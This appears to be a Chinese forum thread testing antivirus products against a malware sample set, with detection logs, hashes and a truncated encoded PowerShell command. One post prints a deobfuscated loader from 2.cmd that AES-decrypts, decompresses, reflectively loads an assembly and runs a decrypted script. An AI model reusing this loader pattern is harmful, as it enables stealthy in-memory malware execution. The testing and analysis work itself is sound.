x3 (2024-03-23)

petr0vic

心醉咖啡

360

biue

UNknownOoo

火绒
扫描：2x

1. 病毒详情：
   
2. 风险路径：C:\Users\UnknownOoo\Downloads\Compressed\1.js, 病毒名：SVM:TrojanDownloader/JS.Nemucod.p, 病毒ID：7e19f7fce5c84faa, 处理结果：暂不处理
   
3. 风险路径：C:\Users\UnknownOoo\Downloads\Compressed\2.cmd, 病毒名：Trojan/BAT.Agent.bw, 病毒ID：9d30624f2530e8ed, 处理结果：暂不处理

复制代码

运行：

1. 防护项目：隐藏执行PowerShell
   
2. 执行文件：C:\Users\Serendipity\AppData\Local\Temp\Ywideoovuuu.Vdb
   
3. 执行命令行：C:\Users\SEREND~1\AppData\Local\Temp\Ywideoovuuu.Vdb  -WindowStyle hidden -enc JABLAHUAdwBnAHQAcQAgAD0AIABHAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAoACgAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUAKQAgACsAIAAiAC4AYgBhAHQAIgApACAAfAAgAHMAZQBsAGUAYwB0AC0AbwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFoAZgBrAGIAeABkAHgAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQASwB1AHcAZwB0AHEAKQA7ACQARAB2AHEAeQBiAGsAawBhAG0AZABzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABaAGYAawBiAHgAZAB4ACAAKQA7ACQAWQBzAGMAcwB0AG0AcwBkAGkAaAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQA7ACQAUgBxAHgAdgBtAHEAcwBlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEQA
   
4. 操作结果：已允许
   
5. 进程ID：2448
   
6. 操作进程：C:\Windows\System32\cmd.exe
   
7. 操作进程命令行：C:\Windows\system32\cmd.exe  /K "C:\Users\Serendipity\Desktop\3.bat"   
   

复制代码

1. 病毒名称：TrojanSpy/PassStealer.b
   
2. 病毒ID：861D407817386EB5
   
3. 虚拟地址：0x0000000000400000
   
4. 映像大小：264KB
   
5. 是否完整映像：否
   
6. 数据流哈希：670798bf
   
7. 操作结果：已处理
   
8. 进程ID：11320
   
9. 操作进程：C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
   
10. 操作进程命令行："C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    
11. 父进程ID：10720
    
12. 父进程：C:\Windows\System32\RuntimeBroker.exe
    
13. 父进程命令行：C:\Windows\System32\RuntimeBroker.exe -Embedding

复制代码

puxinqin

解压，ESET杀1，扫描未发现异常，火绒扫描杀2。

km_xyx

bd x2

DisaPDB

Kaspersky scan 2x
2.cmd AMSI kill

1. 事件: 检测到恶意对象
   
2. 用户: DESKTOP-7PJ65GJ\mac
   
3. 用户类型: 发起者
   
4. 应用程序名称: powershell.exe
   
5. 应用程序路径: C:\Windows\SysWOW64\WindowsPowerShell\v1.0
   
6. 组件: AMSI 保护
   
7. 结果说明: 检测到
   
8. 类型: 木马
   
9. 名称: HEUR:Trojan.Win32.Generic
   
10. 精确度: 启发式分析
    
11. 威胁级别: 高
    
12. 对象类型: 字符串
    
13. 对象名称: amsi_stream_27
    
14. 对象路径: uid://
    
15. 对象的 SHA256: E3F45870BE3F2313E974A3C9C0455FF9E9CD6B8F2142943D6FF26348C838F433
    
16. 对象的 MD5: E5FFD5AE4CBA50E03AE621A83E740BFA
    
17. 原因: 专家分析
    
18. 数据库发布日期: 2024/3/17 上午6:34:00

复制代码

1. $host.UI.RawUI.WindowTitle = 'C:\lbtxixe\2.cmd'
   
2. 
   
3. $KUZI = @('Ele', 'Sbplr', 'Dcxecompres', 'Enzdtnt', 'CDKroTDKRro', 'Crematem', 'Lqoad', 'Fibromas6S4string', 'MIkMWnodul', 'GEhZzCEzurProces', 'InvYokV', 'ChalJqNgeNextion', 'ReaLiken', 'TyKjzranyformBlyock')
   
4. 
   
5. function DecryptAES($encryptedData){
   
6.     $aes = [System.Security.Cryptography.Aes]::Create()
   
7.     $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
   
8.     $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
   
9.     $aes.Key = [System.Convert]::FromBase64String('TYzwx+VQruSBclwTSei5OE5DbGGUAEnGVbMuihV8YQU=')
   
10.     $aes.IV = [System.Convert]::FromBase64String('+LTXnHvK40EXoqLlqGzCsw==')
    
11.    
    
12.     $decryptor = $aes.CreateDecryptor()
    
13.     $decryptedData = $decryptor.TransformFinalBlock($encryptedData, 0, $encryptedData.Length)
    
14.    
    
15.     $decryptor.Dispose()
    
16.     $aes.Dispose()
    
17.    
    
18.     return $decryptedData
    
19. }
    
20. 
    
21. function Decompress($compressedData){
    
22.     $memoryStreamIn = New-Object System.IO.MemoryStream, $compressedData
    
23.     $memoryStreamOut = New-Object System.IO.MemoryStream
    
24.     $gzipStream = New-Object System.IO.Compression.GZipStream($memoryStreamIn, [IO.Compression.CompressionMode]::Decompress)
    
25.     $gzipStream.CopyTo($memoryStreamOut)
    
26.    
    
27.     $gzipStream.Dispose()
    
28.     $memoryStreamIn.Dispose()
    
29.     $memoryStreamOut.Dispose()
    
30.    
    
31.     return $memoryStreamOut.ToArray()
    
32. }
    
33. 
    
34. $encryptedAssembly = [System.IO.File]::ReadAllBytes([Console]::Title)
    
35. $decryptedAssembly = Decompress(DecryptAES([System.Linq.Enumerable]::Skip($encryptedAssembly, 5).Substring(2)))
    
36. [System.Reflection.Assembly]::Load($decryptedAssembly).EntryPoint.Invoke($null, $null)
    
37. 
    
38. $encryptedScript = [System.IO.File]::ReadAllBytes([Console]::Title)
    
39. $decryptedScript = Decompress(DecryptAES([System.Linq.Enumerable]::Skip($encryptedScript, 6).Substring(2)))
    
40. Invoke-Expression -Command $decryptedScript
    

复制代码

1. 事件: 检测到恶意对象
   
2. 用户: DESKTOP-7PJ65GJ\mac
   
3. 用户类型: 发起者
   
4. 组件: 恶意软件扫描
   
5. 结果: 检测到
   
6. 结果说明: 检测到
   
7. 类型: 木马
   
8. 名称: HEUR:Trojan.Script.Generic
   
9. 精确度: 启发式分析
   
10. 威胁级别: 高
    
11. 对象类型: 文件
    
12. 对象名称: 1.js
    
13. 对象路径: C:\Users\mac\Desktop\3
    
14. 对象的 SHA256: 1A09632B975BE4725612E9E839691638A5519B2D0F62926156F9BC04ADBD25A3
    
15. 对象的 MD5: C43E09B054BDBC559F99F18314AB21AF
    
16. 原因: 专家分析
    
17. 数据库发布日期: 2024/3/17 上午6:34:00

复制代码

1. 事件: 检测到恶意对象
   
2. 用户: DESKTOP-7PJ65GJ\mac
   
3. 用户类型: 发起者
   
4. 组件: 恶意软件扫描
   
5. 结果: 检测到
   
6. 结果说明: 检测到
   
7. 类型: 木马
   
8. 名称: HEUR:Trojan.BAT.Setter.gen
   
9. 精确度: 启发式分析
   
10. 威胁级别: 高
    
11. 对象类型: 文件
    
12. 对象名称: 3.bat
    
13. 对象路径: C:\Users\mac\Desktop\3
    
14. 对象的 SHA256: B17BB3ACFDBDC750BC117C6E973019D71F6F182B64ED4E680746AC6604158C18
    
15. 对象的 MD5: 223072360201FB722BF71754187D6146
    
16. 原因: 专家分析
    
17. 数据库发布日期: 2024/3/17 上午6:34:00

复制代码

hhhq316

安天

祸兮福所倚

清空

吃瓜群众第123位

瑞星esm365 miss all